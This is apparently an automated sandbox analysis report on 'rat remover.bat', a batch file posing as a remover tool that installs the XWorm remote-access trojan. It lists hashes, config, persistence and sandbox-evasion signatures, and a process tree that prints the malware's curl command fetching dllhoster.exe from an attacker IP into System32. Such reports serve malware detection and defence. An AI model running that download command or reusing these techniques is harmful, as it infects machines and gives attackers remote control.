Analysis
max time kernel: 113s
max time network: 119s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21-11-2024 19:48
Static task: static1
Behavioral task: behavioral1
  Sample: rat remover.bat
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: rat remover.bat
  Resource: win10v2004-20241007-en
General
Target: rat remover.bat
Size: 8KB
MD5: 37fa5465a015515ca2d1aec1265e50e2
SHA1: c70aab71cac4f51b51e1e9b796dac8d85109442f
SHA256: a5f72f5b6a80a798b398d9e0af0d06647ebd7af9d00a38213ec079b59820cad3
SHA512: 95ac8955274885d368d8d338bd5bd3448bfb2191118258a2c806b550ac3d314f0a7ea2496d1c526ea3341d41ac0f34bdd8431b9e2051cbdc35199a05a3be0356
SSDEEP: 96:ci4bPeGVlBbGV5FYAUdaIQe/0uscQGZ/nWuPloLe9maMBqeTBKAR4iWPMY+aBUAS:DoW77Shdsusc1l6aVh/y
Malware Config
Extracted: xworm
Install_directory: %AppData%
install_file: dllhoster.exe
pastebin_url: https://pastebin.com/raw/7dw5bmk3
Signatures
Detect Xworm Payload (2 IoCs)
resource | yara_rule
behavioral2/files/0x0007000000023cbd-2.dat | family_xworm
behavioral2/memory/2708-5-0x0000000000F30000-0x0000000000F4A000-memory.dmp | family_xworm
Xworm family
Downloads MZ/PE file
Executes dropped EXE (1 IoCs)
pid | Process
2708 | dllhoster.exe
Adds Run key to start application (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhoster = "C:\\Users\\Admin\\AppData\\Roaming\\dllhoster.exe" | dllhoster.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
flow | ioc
23 | pastebin.com
24 | pastebin.com
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
21 | ip-api.com
Drops file in System32 directory (1 IoCs)
description | ioc | Process
File created | C:\Windows\system32\dllhoster.exe | curl.exe
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | taskmgr.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses (44 IoCs)
pid | Process
2708 | dllhoster.exe (7 entries)
1700 | taskmgr.exe (37 entries)
Suspicious use of AdjustPrivilegeToken (4 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 2708 | dllhoster.exe
Token: SeDebugPrivilege | 1700 | taskmgr.exe
Token: SeSystemProfilePrivilege | 1700 | taskmgr.exe
Token: SeCreateGlobalPrivilege | 1700 | taskmgr.exe
Suspicious use of FindShellTrayWindow (48 IoCs)
pid | Process
1700 | taskmgr.exe (48 entries)
Suspicious use of SendNotifyMessage (48 IoCs)
pid | Process
1700 | taskmgr.exe (48 entries)
Suspicious use of SetWindowsHookEx (1 IoCs)
pid | Process
2708 | dllhoster.exe
Suspicious use of WriteProcessMemory (8 IoCs)
description | pid | Process | procid_target
PID 968 wrote to memory of 3508 | 968 | cmd.exe | 85 (2 entries)
PID 3508 wrote to memory of 4304 | 3508 | net.exe | 86 (2 entries)
PID 968 wrote to memory of 640 | 968 | cmd.exe | 87 (2 entries)
PID 968 wrote to memory of 2708 | 968 | cmd.exe | 88 (2 entries)
Processes
C:\Windows\system32\cmd.exe (PID 968)
  Command: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat remover.bat"
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe (PID 3508)
    Command: net session
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 4304)
      Command: C:\Windows\system32\net1 session
  C:\Windows\system32\curl.exe (PID 640)
    Command: curl -s -o "C:\Windows\system32\dllhoster.exe" "http://185.254.97.159:4823/dllhoster.exe"
    - Drops file in System32 directory
  C:\Windows\system32\dllhoster.exe (PID 2708)
    Command: "C:\Windows\system32\dllhoster.exe"
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
C:\Windows\system32\svchost.exe (PID 3440)
  Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
C:\Windows\system32\taskmgr.exe (PID 1700)
  Command: "C:\Windows\system32\taskmgr.exe" /4
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 76KB
MD5: 89a4f27d32e9c88340099e2a1de430ef
SHA1: f4d77ea7d65c769bd571b2c0d1d141f3cfb463fb
SHA256: 30167c2fb287e4ab79e936cf8aca48d1f776e71648da2f872e5e66f8925b0f48
SHA512: fe0aae62e32541122d598b6010c0c5b5537885cd28b1e6906305c546b4530de9e84fd1796b1645e633d7faae9568d060a5abae768eb0c90575aa41643ec83342